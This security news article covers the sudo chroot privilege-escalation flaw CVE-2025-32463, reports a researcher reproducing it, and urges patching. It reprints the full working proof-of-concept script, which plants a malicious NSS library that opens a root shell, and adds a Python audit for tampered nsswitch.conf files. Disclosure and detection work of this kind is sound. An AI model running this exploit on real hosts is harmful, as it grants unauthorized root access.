Redazione RHC : 2 July 2025 13:06
Yesterday, Red Hot Cyber published an in-depth analysis of a serious vulnerability discovered in SUDO (CVE-2025-32463), which allows escalation of privileges to root in Linux environments by abusing the chroot function.
The exploit, made public by Stratascale, demonstrates how a non-privileged user can obtain root access through a precise chain of operations that takes advantage of incorrect handling of child processes in chroot environments.
Manuel Roccon, a researcher from the Red Hot Cyber HackerHood group, wanted to get his hands on the exploit to concretely verify its scope and evaluate its replicability in real environments. “I couldn’t resist the temptation to test it in an isolated environment. It’s impressive how straightforward and clean the mechanism is, once the requirements of the PoC are met,” Manuel says.
The team then tested the Proof of Concept published by Stratascale (Exploit CVE-2025-32463 – sudo chroot). The result? Privilege escalation successfully achieved.
The exploit takes advantage of a situation where sudo executes a command in a chroot environment but leaves the child process some room to break out of the chroot and manipulate the process namespace to gain full root access.
The CVE-2025-32463 exploit, demonstrated in the sudo-chwoot.sh PoC by Rich Mirch (Stratascale CRU), exploits a vulnerability in sudo that allows an unprivileged user to gain root privileges when sudo is run with the -R option (which specifies a chroot directory). The script creates a temporary environment (/tmp/sudowoot.stage.*), compiles a malicious shared library (libnss_/woot1337.so.2) containing a constructor function that elevates privileges and opens a root shell (/bin/bash), and forces sudo to load it as an NSS library in the chroot context.
The technique exploits a logic flaw in the handling of the NSS library in chroot environments, where sudo dynamically loads external libraries without properly isolating them. The script sets up a fake nsswitch.conf configuration to force the use of its own library, placing it inside the woot/ directory, which acts as a virtual root for the chroot. When sudo -R woot woot is executed, the woot1337.so.2 library is loaded and its code runs automatically thanks to the __attribute__((constructor)) attribute, thus achieving privilege escalation.
The key requirements for successfully exploiting this vulnerability include:
- chroot via sudo (the -R option);
- the sudoers configuration.
Below are the simple lines of the script:
```bash
#!/bin/bash
# sudo-chwoot.sh
# CVE-2025-32463 – Sudo EoP Exploit PoC by Rich Mirch
# @ Stratascale Cyber Research Unit (CRU)

# Scratch directory that holds both the fake chroot and the library
STAGE=$(mktemp -d /tmp/sudowoot.stage.XXXXXX)
cd ${STAGE?} || exit 1

# Shared library whose constructor runs as soon as it is loaded
cat > woot1337.c<<EOF
#include <stdlib.h>
#include <unistd.h>

__attribute__((constructor)) void woot(void) {
  setreuid(0,0);
  setregid(0,0);
  chdir("/");
  execl("/bin/bash", "/bin/bash", NULL);
}
EOF

# Fake root for -R, with an nsswitch.conf that names the library as a service
mkdir -p woot/etc libnss_
echo "passwd: /woot1337" > woot/etc/nsswitch.conf
cp /etc/group woot/etc
gcc -shared -fPIC -Wl,-init,woot -o libnss_/woot1337.so.2 woot1337.c

echo "woot!"
sudo -R woot woot

rm -rf ${STAGE?}
```
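As an added defender-side check (not part of the article or of the Stratascale PoC), the following Python audits an nsswitch.conf body the way glibc interprets it: each service name becomes libnss_NAME.so.2, so a name containing a slash, like the planted passwd: /woot1337 entry, turns into a file path instead of a library name. The allowlist of service names and the sample file are constructed assumptions; run audit_nsswitch over /etc/nsswitch.conf and over any nsswitch.conf found outside /etc.

```python
import re

# glibc builds the NSS module name from the service name in nsswitch.conf:
# service "files" -> "libnss_files.so.2". A service name containing "/" thus
# becomes a path ("libnss_/woot1337.so.2"), which is what the PoC's
# "passwd: /woot1337" entry relies on to pull in an attacker-built library.
# Allowlist of ordinary service names (an assumption; extend it for your hosts).
KNOWN_SERVICES = {"files", "dns", "compat", "db", "systemd", "myhostname",
                  "mdns4_minimal", "mdns4", "resolve", "sss", "ldap", "nis",
                  "winbind"}
ACTION_RE = re.compile(r"\[[^\]]*\]")   # action specifiers, e.g. [NOTFOUND=return]


def nss_library_name(service):
    """Library file name glibc derives from an nsswitch.conf service name."""
    return f"libnss_{service}.so.2"


def audit_nsswitch(text):
    """Return (database, service, reason) findings for an nsswitch.conf body."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()          # drop comments
        if not line or ":" not in line:
            continue
        database, _, services = line.partition(":")
        services = ACTION_RE.sub(" ", services)       # drop [ACTION=...] groups
        for svc in services.split():
            if "/" in svc:
                reason = f"service is a path: glibc would load {nss_library_name(svc)}"
            elif svc not in KNOWN_SERVICES:
                reason = "service not in allowlist"
            else:
                continue
            findings.append((database.strip(), svc, reason))
    return findings


# Constructed sample: the entry the PoC writes, plus two ordinary lines.
SAMPLE_NSSWITCH = """# constructed sample, not a real host file
passwd: /woot1337
group:  files systemd
hosts:  files dns [NOTFOUND=return] mdns4_minimal
"""

if __name__ == "__main__":
    for db, svc, why in audit_nsswitch(SAMPLE_NSSWITCH):
        print(f"{db}: {svc} -> {why}")
```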
The test performed by Manuel Roccon demonstrates that this vulnerability is not only theoretical, but fully exploitable in production environments that are not properly protected. In DevOps or containerized scenarios, where the use of sudo and chroot is common, the risks increase considerably.
Red Hot Cyber and the HackerHood group recommend immediately updating SUDO to the latest available version, and reviewing security configurations related to chroot and sudoers permissions.
Security starts with awareness. Stay tuned for technical analysis, tested PoCs and updated reports.